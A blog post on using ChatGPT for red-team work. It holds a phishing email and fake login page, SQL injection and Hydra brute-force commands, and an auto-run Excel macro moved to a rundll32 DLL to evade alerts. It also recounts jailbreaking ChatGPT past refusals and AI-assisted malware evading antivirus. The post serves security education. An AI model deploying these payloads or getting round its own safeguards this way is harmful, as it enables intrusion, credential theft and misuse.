Cybersecurity & ChatGPT - Part 3 - Generative AI for Red Teams

Photo from Pixabay

In the previous post of our series Cybersecurity & ChatGPT, we delved into the realm of Generative AI for Blue Teams, focusing on the use of Generative AI (GenAI) for defensive cybersecurity. Building on that foundation, in this post we change the color of our hat and shift the spotlight onto the use of ChatGPT and similar Large Language Models (LLMs) for offensive cybersecurity.

Red Teams play a pivotal role by simulating real-world cyber attacks to assess and enhance the security of an organization's systems, networks, and applications. In this context, we explore how Red Teams can leverage the formidable capabilities of ChatGPT to enhance their offensive strategies.

In this post, active participation is not just encouraged but essential. As we navigate through the exercises, grab your preferred LLM (ChatGPT, Gemini, Llama-2) and embark on this learning adventure alongside us. Feel free to experiment with different prompts, as varied queries can yield diverse responses. Prepare to be amazed at the insights and possibilities that unfold as we merge the power of ChatGPT with the strategic mindset of cybersecurity Red Teams.

🐈🔵 The Cat & Mouse Game 🔴🐭

As defenders enhance security measures, hackers adapt and find new vulnerabilities, creating an endless loop of innovation and exploitation. This dynamic landscape highlights the crucial role of Red Teams, who emulate hackers' tactics, techniques, and procedures to identify weaknesses in a system so that they can be strengthened. With the emergence of new LLMs such as ChatGPT, Red Teams are incorporating GenAI technologies into their daily activities, adding a new dimension to this never-ending race.

Before delving into specific examples, it is crucial to establish a foundational understanding of the ethical considerations associated with using LLMs for Red Team activities. One primary concern is the potential misuse of these models to exploit vulnerabilities, compromise systems, or gain unauthorized access. Ethical hacking, or penetration testing, is a legitimate practice when conducted within the boundaries of the law and under a defined scope. Nevertheless, the line between ethical and unethical use becomes blurred when LLMs are employed in Red Team activities. Moreover, many of the scenarios proposed in this post require prompt injection or jailbreaking techniques [8] to push the boundaries of LLMs. With these techniques, a user can bypass the restrictions placed on a model to gain access to its full capabilities. As we work through the practical examples, it is essential to keep a critical eye on the ethical considerations involved and to use LLMs responsibly.

In the upcoming sections, we navigate the intersection of GenAI with offensive cybersecurity through several hands-on examples, examining their roles in social engineering attacks, penetration testing, task automation, malware development, code vulnerability exploitation, macros & LOLBins (Living-off-the-Land Binaries), and the mastery of hacking tools. These discussions cover the applications, risks, and ethical considerations of using GenAI technologies for Red Team activities. Prepare for an insightful journey into the forefront of cybersecurity, where AI reshapes conventional paradigms and poses new challenges for defenders and adversaries alike.

Social Engineering

Social engineering is a tactic in which attackers manipulate individuals into divulging confidential information or performing actions that may compromise security. Instead of directly exploiting technical vulnerabilities, social engineering relies on psychological manipulation to deceive people into taking actions that benefit the attacker. These attacks often exploit human nature, trust, and the tendency to be helpful. This approach involves duping individuals into disregarding established security protocols, leading them to compromise personal data, divulge login credentials, or unknowingly download malicious software. The arsenal of social engineering attacks is diverse and continually evolving.

Phishing stands out as one of the most prevalent threats in the cybersecurity landscape. Reference [2] summarizes the five most impactful phishing attacks, ranked by the financial losses incurred up to 2022. This cyber attack uses deceptive emails, text messages, or phone calls masquerading as legitimate entities, such as banks or government agencies, to trick individuals into revealing sensitive information. Spear phishing, a more targeted variation, tailors messages to specific individuals or organizations, using publicly available information to enhance credibility. Baiting, scareware, pretexting, and quid pro quo are additional tactics within the social engineering playbook, each designed to manipulate human instincts for financial gain or unauthorized access.

ChatGPT and other LLMs have changed the way attackers design their phishing campaigns. Thanks to their language processing capabilities, LLMs can generate realistic emails that appear to come from trusted sources, such as a bank or a popular online service. These emails trick people into revealing sensitive information or clicking on malicious links.



In the upcoming example, we assess how easy it is to build a phishing campaign with GenAI technologies. In our experiment, we design a phishing email containing a malicious URL. The link opens a fake login page that harvests the victim's credentials. To complete these tasks, we use ChatGPT to write the email and craft the fake login page. Ready?

First of all, we use ChatGPT to craft a basic login page. Of course, some adjustments are necessary to customize the page to a corporate brand and make it more realistic. We do not need to be experts in HTML or JavaScript; we simply describe all our requirements in the prompt. For our example, the following prompt is enough to craft a simple login web page.

ChatGPT outputs the following code:

```html
<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <title>Login Page</title>
  <style>
    body {
      font-family: Arial, sans-serif;
      background-color: #f4f4f4;
      margin: 0;
      display: flex;
      align-items: center;
      justify-content: center;
      height: 100vh;
    }
    form {
      background-color: #fff;
      padding: 20px;
      border-radius: 5px;
      box-shadow: 0 0 10px rgba(0, 0, 0, 0.1);
      width: 300px;
    }
    label {
      display: block;
      margin-bottom: 8px;
    }
    input {
      width: 100%;
      padding: 8px;
      margin-bottom: 16px;
      box-sizing: border-box;
    }
    button {
      background-color: #4caf50;
      color: #fff;
      padding: 10px;
      border: none;
      border-radius: 5px;
      cursor: pointer;
      width: 100%;
    }
    button:hover {
      background-color: #45a049;
    }
  </style>
</head>
<body>
  <form>
    <label for="username">Username:</label>
    <input type="text" id="username" name="username" required>
    <label for="password">Password:</label>
    <input type="password" id="password" name="password" required>
    <button type="submit">Login</button>
  </form>
</body>
</html>
```

When the page is opened in a browser, we get the following web page:



Next, we could use ChatGPT to develop a basic back-end for capturing the submitted credentials; ChatGPT is proficient in languages like PHP, Python, or Java. Once the login page is complete, the next step is to generate the content of the phishing email. We use the following prompt:

ChatGPT Output:

Subject: Urgent: Action Required for Your Account

Hi [Recipient's Name],

I hope this message finds you well. We've identified an issue with your account that needs immediate attention. To resolve this, please click on the recovery link here: [Insert Recovery Link]. Follow the steps to verify and restore your account securely.

If you encounter any issues or have concerns, reach out to our customer support at [Your Customer Support Email or Phone Number].

Thank you for your prompt attention to this matter.

Best,
[Your Full Name]
[Your Position]
[Your Company]

As you can see, the process can easily be automated to run massive phishing campaigns: tailoring the web content to various audiences, writing the email in many languages, or adapting it to specific user profiles. The range of possibilities is extensive. So be wary of unsolicited emails, verify the sender's identity, double-check suspicious links, and be careful with attachments.

The nuanced, human-like output generated by models like GPT-3.5 or Gemini makes it difficult for traditional methods to distinguish machine-generated from human-written text. Some AI solutions have emerged to tell them apart: by analyzing linguistic patterns, semantic coherence, and contextual nuances, these classifiers try to identify the subtle discrepancies that often characterize text produced by Generative AI. Nevertheless, AI text classifiers have poor detection rates. For instance, OpenAI's AI Text Classifier correctly identified only 26% of AI-written text as likely AI-written [3]. Free tools such as GPTZero, Corrector App, and GPTRadar are also available online to analyze and identify AI-generated text. While easily accessible, these tools lack the robustness required to reliably identify text produced by sophisticated GenAI models.

Pentesting

Generative AI tools like ChatGPT open innovative possibilities for assessing and fortifying cybersecurity defenses. These tools can assist security professionals by simulating human-like interactions to identify vulnerabilities in systems, applications, and networks. They can also help create realistic and dynamic attack scenarios, allowing organizations to anticipate and respond to emerging threats. Now, let's explore what Generative AI can offer pentesting by analyzing two tools: PentestGPT and BurpGPT.

PentestGPT [1] is a cutting-edge penetration testing tool that leverages the capabilities of Large Language Models. It streamlines and automates the penetration testing process, operating in an interactive mode to guide penetration testers throughout the entire testing lifecycle. Powered by ChatGPT, PentestGPT assists testers both in overseeing overall progress and in executing specific operations efficiently. With a focus on practicality, PentestGPT has proven capable of solving easy to medium HackTheBox machines as well as various Capture The Flag (CTF) challenges.
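PentestGPT keeps track of overall progress as a hierarchical to-do list, marking tasks as completed and proposing the next one. The Python sketch below models that idea with a small task tree. It is our own illustration, not PentestGPT's implementation: the `Task` class and its methods are hypothetical, and where PentestGPT relies on the LLM to decide the next step, this sketch simply picks the first unfinished leaf in depth-first order.

```python
from dataclasses import dataclass, field
from typing import List, Optional


@dataclass
class Task:
    """A node in a hypothetical pentest to-do tree."""
    name: str
    done: bool = False
    subtasks: List["Task"] = field(default_factory=list)

    def add(self, name: str) -> "Task":
        """Append a child task and return it so it can be extended further."""
        child = Task(name)
        self.subtasks.append(child)
        return child

    def next_pending(self) -> Optional["Task"]:
        """Depth-first search for the first unfinished leaf task."""
        if not self.subtasks:
            return None if self.done else self
        for sub in self.subtasks:
            found = sub.next_pending()
            if found is not None:
                return found
        return None

    def render(self, prefix: str = "") -> List[str]:
        """Render the tree with hierarchical numbering (1., 1.1., ...)."""
        lines = []
        for i, sub in enumerate(self.subtasks, start=1):
            label = f"{prefix}{i}"
            status = " (Completed)" if sub.done else ""
            lines.append(f"{label}. {sub.name}{status}")
            lines.extend(sub.render(prefix=f"{label}."))
        return lines


# Usage: rebuild part of a to-do list after an Nmap scan has finished
root = Task("HTB web challenge")
recon = root.add("Reconnaissance")
recon.add("Nmap scan").done = True
recon.add("Identify web technologies")
web = root.add("Web Testing")
web.add("Nikto")
web.add("Gobuster")

print("\n".join(root.render()))
print("Next task:", root.next_pending().name)
```

Keeping the plan as a tree rather than a flat list makes it easy to mark a whole branch as finished and to re-render the current state after each tool result, which is the kind of progress tracking the PentestGPT transcript displays.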

In the following example, we extracted a fragment of the penetration testing records (the communication between the pentester and PentestGPT) from the PentestGPT GitHub project. In this demo, the authors use the tool to tackle a HackTheBox challenge. The complete example is available in the project's repository.

[user]: I want to test a HTB challenge machine. It is a web challenge, and the target is 139.59.189.117:31877

[user]: next

[user]: Source: tool
I performed nmap, and seems like only port 80 is open

[pentestGPT]: Based on the analysis, the following tasks are recommended:Based on the provided summary, I've analyzed the current situation and updated the to-do list:
1. Reconnaissance
1.1. Nmap scan (Completed)
1.2. Identify web technologies
2. Web Testing
2.1. Nikto
2.2. Gobuster
3. Vulnerability Analysis
3.1. Manual analysis
3.2. Automated tools
4. Exploitation
4.1. Web vulnerabilities
4.2. Remote Code Execution

--------

Next task: Perform a Nikto scan on the target IP (139.59.189.117) and port 80 to identify potential vulnerabilities and misconfigurations in the web server.

----------------------------------------

[user]: next

[user]: Source: tool
Nikto shows that the target server is running Python Flask. Other than that, it shows nothing interesting

[pentestGPT]: Based on the analysis, the following tasks are recommended:Based on the provided summary, I've analyzed the current situation and updated the to-do list:
1. Reconnaissance
1.1. Nmap scan (Completed)
1.2. Identify web technologies (Completed)
2. Web Testing
2.1. Nikto (Completed)
2.2. Gobuster
2.3. Flask-specific tests
3. Vulnerability Analysis
3.1. Manual analysis
3.2. Automated tools
4. Exploitation
4.1. Web vulnerabilities
4.2. Remote Code Execution

[...]

Amazing, isn't it? Now, let's explore another fantastic tool, BurpGPT [4].



Like PentestGPT, BurpGPT was developed to uncover security vulnerabilities. BurpGPT is a Burp Suite extension that integrates AI and Natural Language Processing (NLP) to enhance the security assessment process. The extension works as a passive scanner, forwarding web traffic to an OpenAI model for automatic analysis. What sets BurpGPT apart is its customizable prompts, which let users tailor the traffic analysis to their specific requirements. The tool produces an automated security report summarizing potential issues, based on the user's prompts and real-time data from Burp requests. These features give security professionals a comprehensive, high-level overview of the scanned application or endpoint, enabling quicker identification of potential security threats and better alert prioritization. Below is an example of the output generated by the BurpGPT extension.

As we have seen, Generative AI not only streamlines and enhances traditional penetration testing processes but also introduces a new dimension of adaptability and efficiency. The ability to guide the pentesting process, identify vulnerabilities automatically, and propose security measures makes these tools valuable for testing the robustness and resilience of cyber environments.
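To make the idea of customizable prompts more concrete, here is a minimal Python sketch of how a passive scanner could turn one captured HTTP exchange into a prompt for a language model. It is not BurpGPT's code: the template text, the `{url}`, `{method}`, `{request}`, and `{response}` placeholders, the `build_prompt` helper, and the 2,000-character budget are all assumptions for illustration, and the step that actually sends the prompt to a model is deliberately left out.

```python
# Hypothetical default template; BurpGPT defines its own placeholder names
DEFAULT_TEMPLATE = (
    "You are a web security analyst. Review the HTTP exchange below and "
    "list potential vulnerabilities, ordered by severity.\n"
    "URL: {url}\n"
    "Method: {method}\n"
    "Request:\n{request}\n\n"
    "Response:\n{response}\n"
)

MAX_CHARS = 2000  # assumed per-message budget to keep prompts within model limits


def truncate(text: str, limit: int = MAX_CHARS) -> str:
    """Cut long messages and mark them so the model knows data is missing."""
    if len(text) <= limit:
        return text
    return text[:limit] + "\n[...truncated...]"


def build_prompt(url: str, method: str, request: str, response: str,
                 template: str = DEFAULT_TEMPLATE) -> str:
    """Fill a user-customizable template with one captured exchange.

    str.format ignores keyword arguments the template does not use, so a
    custom template may reference only a subset of the placeholders.
    """
    return template.format(
        url=url,
        method=method,
        request=truncate(request),
        response=truncate(response),
    )


# Usage: a custom template that focuses the analysis on cookie flags
cookie_template = (
    "Check only the Set-Cookie headers of this response from {url} "
    "for missing Secure or HttpOnly flags:\n{response}"
)
request = "GET /account HTTP/1.1\r\nHost: example.com\r\n\r\n"
response = "HTTP/1.1 200 OK\r\nSet-Cookie: session=abc123\r\n\r\n" + "A" * 5000

default_prompt = build_prompt("https://example.com/account", "GET", request, response)
cookie_prompt = build_prompt("https://example.com/account", "GET", request, response,
                             template=cookie_template)
print(cookie_prompt[:160])
```

Swapping the template is all it takes to refocus the analysis, which mirrors the flexibility described for BurpGPT; truncation matters because full HTTP responses can easily exceed a model's context window.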

Scripting

LLMs are valuable tools for scripting and task automation. Models like ChatGPT can generate high-quality code snippets and automation scripts by interpreting complex requirements expressed in natural language. This versatility enables users to automate many tasks, from data manipulation and analysis to content generation. Models like ChatGPT allow Red Teams to assemble scripts that automate workflows, reduce manual effort, and enable individuals with limited programming experience to perform sophisticated tasks.

Consider the following hypothetical scenario: a security analyst aims to perform a brute-force simulation on a target system using email-password pairs obtained from a large text file. The analyst has Python scripting skills but realizes that Python is unavailable in the target environment. The analyst also notes that a preprocessing step is needed, since the text file contains extra information besides each user's email and password. To streamline the brute-force campaign, the analyst plans to use Bash scripting to extract and format the data, discarding unnecessary elements. Afterwards, he can use conventional Linux tools such as curl or wget to send HTTP requests to the login endpoint of the target system.

The first step is to create a Bash script that processes the data in its original format. Since his Bash scripting skills are limited, he turns to ChatGPT to accomplish this objective.

Original dataset:

Emily example1@email.com USA 123456

James user123@example.com CAN cats123

Sophia test.email@example.com GB admin

Michael john.doe@emailprovider.com DE 12345678

Olivia myname@examplewebsite.org FR qwerty

[…]

As shown above, the fields in the dataset are separated by single spaces. In this case, our analyst is interested only in the second and fourth columns of the file (the email and the password). Let's ask ChatGPT for help!

```bash
#!/bin/bash

# Check if a file is provided as an argument
if [ -z "$1" ]; then
  echo "Usage: $0 <filename>"
  exit 1
fi

# Iterate through each line in the file
while IFS= read -r line; do
  # Use awk to extract the 2nd and 4th word
  word2=$(echo "$line" | awk '{print $2}')
  word4=$(echo "$line" | awk '{print $4}')

  # Print the extracted words
  echo "2nd word: $word2, 4th word: $word4"
done < "$1"
```

Although this example is quite simple, it illustrates the number of tasks that GenAI can automate and the myriad possibilities this technology offers. In the subsequent section, we take a further stride by delving into the application of GenAI for crafting malicious software.

Malware Development



Numerous studies have demonstrated the simplicity with which malicious entities can generate malware, such as ransomware, keyloggers, and viruses, utilizing ChatGPT and other LLMs.

Despite the ethical restrictions imposed on LLMs, using them to produce code that evades security products is a reality. While writing complete malware might be blocked by ChatGPT's ethical guidelines, using the model to create separate functions or modules that can later be combined into a malicious software package is a possible workaround. That is the approach followed in [5], where the authors use ChatGPT to generate small code snippets as parts of a complete malicious executable. They devised malware capable of scanning a system for specific documents, fragmenting those documents and embedding the fragments into image files, and transmitting them via Google Drive. To assess whether detection tools such as antivirus (AV) software could identify the ChatGPT-generated code as malicious, the authors submitted it to VirusTotal. Initially, five out of 60 vendors flagged the file as suspicious. After the authors instructed the chatbot to adjust certain parts of the code, only two vendors flagged it. Through subsequent refinements, they ultimately produced code that none of the vendors on VirusTotal detected.

The ability to mutate the original code and introduce constraints, such as changing the usage of specific API calls, poses a significant challenge for security products like EDRs. Because they can generate original content, Generative AI tools enable the creation of polymorphic malware, which alters its characteristics while maintaining its core functionality. Since traditional AV programs often rely on signature-based detection, polymorphic malware can produce new, unique instances that do not match existing signatures, making detection difficult.
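The following Python sketch illustrates why signature matching struggles with code that keeps changing shape. It deliberately simplifies signature-based detection to an exact SHA-256 match against a tiny, hypothetical signature set (real AV engines also use byte patterns, heuristics, and behavioral analysis), and the two harmless snippets simply stand in for functionally equivalent variants of a program.

```python
import hashlib


def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


# Two harmless, functionally equivalent variants: both define f() returning 5
variant_a = b"def f():\n    return 2 + 3\n"
variant_b = b"def f():\n    x = 2\n    return x + 3\n"

# Hypothetical signature database that only knows variant A
known_signatures = {sha256_hex(variant_a)}


def is_flagged(sample: bytes) -> bool:
    """Exact-hash 'signature' check: flags only byte-identical samples."""
    return sha256_hex(sample) in known_signatures


def run(sample: bytes) -> int:
    """Execute a variant in an isolated namespace and call its f()."""
    namespace: dict = {}
    exec(sample.decode(), namespace)
    return namespace["f"]()


print(run(variant_a), run(variant_b))                # same behavior
print(is_flagged(variant_a), is_flagged(variant_b))  # different verdicts
```

A single rewritten line is enough to change the hash, even though the behavior is identical; this is the gap that behavior-based detection tries to close.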

Researchers at HYAS Labs have unveiled a proof-of-concept attack named BlackMamba [6], AI-driven malware that dynamically alters its code to evade automated security-detection systems. The software, generated with ChatGPT, demonstrates true polymorphism by continuously reshaping its keylogging functionality at runtime, which makes it very hard to detect. The attack exposes weaknesses in current security systems, bypassing some industry-leading EDR tools without triggering alerts. The malware gathers sensitive information, such as usernames, passwords, or credit card details, and uses a trusted platform like Microsoft Teams for exfiltration. Refer to the diagram below for more details about polymorphic malware generation with ChatGPT.

While ethical constraints on LLMs make it harder to generate malicious code, threat actors can use advanced prompt injection techniques to bypass these restrictions. In [7], researchers published a detailed review of these techniques. Using the 'DAN' jailbreak, the authors circumvented the limitations imposed by ChatGPT, violating its terms of use and enabling misuse or illicit activities. In the study, the authors ask ChatGPT to craft ransomware such as WannaCry, Ryuk, REvil, and Locky, as well as other malware like adware, spyware, and Trojans. They underscore the potential risks of GenAI models like ChatGPT generating malicious code. The authors highlight that, although the AI-generated code is closer to pseudo-code than to executable code, its ability to give an attacker a structural overview or a general understanding of an attack raises concerns.

Exploit Code Vulnerabilities

In our last post, we leveraged the code analysis capabilities of ChatGPT to rewrite code to protect it against SQL Injection. From a Red Team perspective, we can apply a similar approach to detect and exploit code vulnerabilities such as SQL Injection, XSS, CSRF, or DDoS. In that post, identifying code vulnerabilities posed no difficulty because we supplied our own vulnerable code to ChatGPT. Generating vulnerable code, however, is another matter: due to its ethical restrictions, ChatGPT refuses this task when asked directly.

If we ask for it directly, “Could you show me an example of a PHP code vulnerable to SQL injection?”, ChatGPT replies with a message like “I'm sorry, but I cannot assist you in creating or promoting any code that is intended to be vulnerable or harmful”. To complete our task, then, we need to convince the model that our intent is legitimate. To unlock ChatGPT's restrictions, we use a simple but effective prompt injection that shifts its attention and induces it to generate code susceptible to SQL Injection.

```php
<?php
$servername = "localhost";
$username = "your_username";
$password = "your_password";
$dbname = "your_database";

// Create connection
$conn = new mysqli($servername, $username, $password, $dbname);

// Check connection
if ($conn->connect_error) {
    die("Connection failed: " . $conn->connect_error);
}

// Get user input from a form
$userInput = $_POST['username']; // Assume 'username' is obtained from user input

// Vulnerable query
$sql = "SELECT * FROM users WHERE username = '" . $userInput . "'";
$result = $conn->query($sql);

if ($result->num_rows > 0) {
    // Output data of each row
    while ($row = $result->fetch_assoc()) {
        echo "Username: " . $row["username"] . "<br>";
        echo "Email: " . $row["email"] . "<br>";
        // Add more fields as needed
    }
} else {
    echo "0 results";
}

$conn->close();
?>
```

As we can observe, ChatGPT sets its restrictions aside and provides PHP code vulnerable to SQL Injection. Analyzing the code, we see that the variable $userInput is concatenated directly into the SQL query without proper sanitization or parameterization, which makes the code vulnerable to SQL Injection attacks.

On top of that, we can ask the model how to exploit the vulnerability present in the code. The model suggests supplying the payload “' OR '1'='1' --” as the username, which produces the following SQL query:

```sql
SELECT * FROM users WHERE username = '' OR '1'='1' -- '
```

In addition to providing the exploitation payload, ChatGPT gives us a detailed explanation of it: “In this case, the double hyphen (--) is used to comment out the rest of the original query, effectively ignoring the original password check. The condition '1'='1' always evaluates to true, so the query returns all rows from the 'users' table.” Strictly speaking, the query in this example contains no password check; the comment simply neutralizes the trailing single quote left over from the original query.
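The effect of this payload, and the standard fix, can be reproduced safely with Python's built-in sqlite3 module and an in-memory database. This is a sketch under our own assumptions: the two-row users table and the function names are hypothetical, and SQLite stands in for the MySQL database of the PHP example. The first function concatenates input exactly as the PHP code does; the second uses a parameterized query, the same idea as prepared statements in PHP (for example, mysqli's prepare and bind_param).

```python
import sqlite3

# Hypothetical in-memory users table standing in for the MySQL database
conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (username TEXT, email TEXT)")
conn.executemany(
    "INSERT INTO users VALUES (?, ?)",
    [("alice", "alice@example.com"), ("bob", "bob@example.com")],
)

payload = "' OR '1'='1' -- "


def vulnerable_lookup(user_input: str):
    # Input is concatenated into the SQL text, as in the PHP example
    sql = "SELECT * FROM users WHERE username = '" + user_input + "'"
    return sql, conn.execute(sql).fetchall()


def safe_lookup(user_input: str):
    # Input is bound as a value and is never parsed as SQL
    return conn.execute(
        "SELECT * FROM users WHERE username = ?", (user_input,)
    ).fetchall()


sql, leaked = vulnerable_lookup(payload)
print(sql)
print(len(leaked))                # every row is returned
print(len(safe_lookup(payload)))  # no user has that literal name
```

The concatenated version rebuilds exactly the query shown above and returns the whole table, while the parameterized version treats the payload as an ordinary (and non-existent) username.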

Macros

Macros are small programs or scripts associated with documents (such as Microsoft Word or Excel files) to automate tasks. These programs usually use the scripting language Visual Basic for Applications (VBA), embedding the code into the documents.

While macros are useful for automating repetitive tasks and enhancing productivity, they also pose cybersecurity risks because they can be weaponized to hide malware. When a user opens a document containing malicious macros, the code can run automatically, potentially leading to malware installation, unauthorized access, or other harmful activities. Cyber criminals often use weaponized documents with embedded macros as part of phishing attacks. Applications like Excel allow macros to run automatically when a workbook is opened, and attackers abuse this feature to execute malicious code without the user's knowledge. These attacks are especially effective when users have enabled automatic macro execution in their Excel settings. Even with no knowledge of macros or VBA, we can use ChatGPT to embed a macro in an Excel worksheet.



As we see in the following example, ChatGPT gives us a step-by-step guide and the code for executing a PowerShell script when an Excel workbook is opened.

ChatGPT response:

1. Open Excel: Open the Excel workbook in which you want to run the PowerShell script.

2. Access the VBA Editor: Press Alt + F11 to open the Visual Basic for Applications (VBA) editor.

3. Insert a Module: In the VBA editor, right-click on any item in the Project Explorer (usually on the left side) and select Insert → Module. This will create a new module.

4. Write VBA Code: Write the VBA code in the module to execute the PowerShell script. Here's a basic example:

```vba
Private Sub Workbook_Open()
    Dim objShell As Object
    Set objShell = VBA.CreateObject("WScript.Shell")
    objShell.Run "powershell.exe -ExecutionPolicy Bypass -File ""C:\Path\To\Your\Script.ps1""", 1, True
    Set objShell = Nothing
End Sub
```



Not bad at all, but we can refine our approach to avoid triggering security alerts. Instead of calling Cmd or PowerShell directly from our macro, we could use LOLBins to hide our activity. In the ongoing chat session, we guide ChatGPT to modify the code so that the binary rundll32.exe executes our original PowerShell script. ChatGPT immediately provides all the steps to complete the task. First, the model suggests creating a custom DLL (Dynamic Link Library) with a callback function that executes our PowerShell script. Then, the macro invokes this function through the rundll32.exe binary.

ChatGPT response:

```c
#include <Windows.h>

void CALLBACK RunScript(HWND hwnd, HINSTANCE hinst, LPSTR lpszCmdLine, int nCmdShow) {
    ShellExecuteA(NULL, "open", "powershell.exe", "-ExecutionPolicy Bypass -File \"C:\\Path\\To\\Your\\Script.ps1\"", NULL, SW_SHOWNORMAL);
}
```

To create the library, ChatGPT provides the C code above along with instructions to compile it into a DLL file. The model suggests using the MinGW compiler with the following command:

gcc -shared -o RunScript.dll RunScript.c

Finally, it rewrites the Excel VBA code to use rundll32.exe.

```vba
Private Sub Workbook_Open()
    Dim objShell As Object
    Set objShell = VBA.CreateObject("WScript.Shell")
    objShell.Run "rundll32.exe RunScript.dll,RunScript", 1, True
    Set objShell = Nothing
End Sub
```

And that's it, our macro is ready!
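Both macros depend on the same trigger: a procedure named Workbook_Open, which Excel runs when the workbook opens if macros are allowed. That trigger is also what defensive tools look for. The Python sketch below shows the idea by flagging auto-execution procedure names and a few suspicious strings in VBA source that has already been extracted as plain text. The keyword lists are our own, non-exhaustive assumptions; dedicated analyzers such as olevba (from oletools) perform this kind of triage far more thoroughly, including extracting the VBA from the document in the first place.

```python
import re

# Event procedure names that Office runs automatically (non-exhaustive)
AUTOEXEC = ["Workbook_Open", "Auto_Open", "AutoOpen", "Document_Open"]
# Strings often seen in macros that launch other programs (non-exhaustive)
SUSPICIOUS = ["WScript.Shell", "powershell", "rundll32", "-ExecutionPolicy Bypass"]


def triage_vba(source: str) -> dict:
    """Report auto-execution procedures and suspicious strings in VBA text."""
    autoexec = [
        name for name in AUTOEXEC
        if re.search(r"\bSub\s+" + re.escape(name) + r"\s*\(", source, re.IGNORECASE)
    ]
    lowered = source.lower()
    suspicious = [s for s in SUSPICIOUS if s.lower() in lowered]
    return {"autoexec": autoexec, "suspicious": suspicious}


# Usage: the rundll32-based macro from the example above
sample = '''Private Sub Workbook_Open()
    Dim objShell As Object
    Set objShell = VBA.CreateObject("WScript.Shell")
    objShell.Run "rundll32.exe RunScript.dll,RunScript", 1, True
    Set objShell = Nothing
End Sub
'''
print(triage_vba(sample))
```

Swapping PowerShell for rundll32.exe changes which strings appear, but the auto-execution entry point is still there, which is why defenders treat it as a primary indicator.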

If you're curious about similar examples, we suggest checking out the SANS Panel: What You Need to Know About OpenAI's New ChatGPT Bot - And How it Affects Cybersecurity?

Mastering Hacking Tools

Although the knowledge of many LLMs is limited to their training data, these models are still a great source of knowledge for a range of tasks. Novice and expert cybersecurity practitioners alike can use ChatGPT as a valuable learning partner to improve their skills with new tools. Through interactive conversations with ChatGPT, users can simulate real-world scenarios to install, configure, and use cybersecurity tools. ChatGPT can provide step-by-step instructions, tips, explanations, code snippets, and configuration examples. This interactive learning approach speeds up the adoption of unfamiliar tools, improving the ability of cybersecurity teams to respond faster and adapt to changing scenarios.



We know that Nmap is a fantastic tool for reconnaissance tasks such as port scanning. Let's explore whether ChatGPT can assist us in using this tool.

ChatGPT outputs a complete guide with the commands to discover hosts, perform port scanning, detect the services running on open ports, and run Nmap scripts against target hosts for more specific tests.

Discover Hosts:

nmap -sn 192.168.1.1/24 # Discover live hosts in the specified IP range.

Port Scanning:

nmap -p- -A -T4 192.168.1.1/24 # Identify open ports and services.

Service Version Detection:

nmap -p 1-65535 -sV 192.168.1.1/24 # Services running on open ports.

Script Scanning:

nmap -p 1-65535 -sV --script=default 192.168.1.1/24 # Run Nmap scripts against the target hosts.



Due to the stochastic nature of ChatGPT's responses, we recommend regenerating the output several times to discover more features and tips for the tool. In addition, we can provide more information about our final goal to improve the responses. For instance, we could be interested in scanning for vulnerabilities related to the Server Message Block (SMB) protocol, commonly used for file sharing on Windows networks. Let's try!

ChatGPT output:

nmap -p 445 --script=smb-vuln-ms17-010 <target_IP>

ChatGPT recommends the above command, which uses the “smb-vuln-ms17-010” script to check for the well-known EternalBlue vulnerability (MS17-010, CVE-2017-0144).

We can follow similar approaches to use tools like Metasploit, Wireshark, Burp Suite, or Hydra. Let's see an example!

As you know, ChatGPT cannot assist with tasks related to unauthorized access, hacking, or any activity that violates ethical or legal standards. Hence, if we inquire, “Can you supply the syntax for Hydra with SSH brute-forcing?” the model will not carry out the task. However, as demonstrated in various examples within this post, prompt injection techniques may prove helpful in bypassing ChatGPT restrictions to reach our objective.

SSH Brute Force:

hydra -l username -P password_list.txt ssh://target_ip

HTTP Form-Based Authentication:

hydra -l username -P password_list.txt http-post-form "/login.php:username=^USER^&password=^PASS^:Login Failed" -V target_url

ChatGPT provides examples illustrating the fundamental usage of the tool. Alongside SSH and HTTP, the responses also include examples showcasing brute-force attack scenarios for protocols such as FTP, POP3, Telnet, and MySQL.

While ChatGPT can reduce the learning curve of cybersecurity tools, it's crucial to recognize its limitations and emphasize the irreplaceable value of official manuals and documentation. Relying solely on ChatGPT might lead to misconceptions or incomplete understanding. Thus, while ChatGPT is a valuable learning tool, its role is complementary to, not a substitute for, official manuals and documentation.

In this post, we explored the use of ChatGPT for cybersecurity Red Teaming tasks. From designing sophisticated social engineering attacks and guiding penetration tests to automating tasks, developing malware, and exploiting code vulnerabilities, the versatility of ChatGPT is evident. These examples, however, only scratch the surface of the possibilities that arise when Generative AI is leveraged for Red Team operations.

It's crucial to acknowledge that, while ChatGPT offers exciting opportunities, LLMs also bring challenges. Biases, hallucinations, and a lack of transparency in decision-making are some of the limitations users face when working with LLMs. Red Teams must exercise caution and apply a critical eye when using ChatGPT, understanding both its capabilities and its potential shortcomings. As we delve deeper into integrating Generative AI into red team operations, it becomes imperative to strike a balance between innovation and ethical considerations. Continuous refinement and scrutiny of the technology's output are essential to harness its power responsibly.

Our journey exploring the possibilities of Generative AI for cybersecurity is just beginning! So stay tuned for our latest news: new posts are coming!


Hope you enjoy this content!

Stay tuned, and contact us if you have any comments or questions!

References:

- [4] https://github.com/aress31/burpgpt (BurpGPT)

- [7] GUPTA, Maanak, et al. From chatgpt to threatgpt: Impact of generative ai in cybersecurity and privacy. IEEE Access, 2023.

- [8] PATEL, Andrew; SATTLER, Jason. Creatively malicious prompt engineering. WithSecure Intelligence, 2023.

Follow us: Twitter: @ds4n6_io - Youtube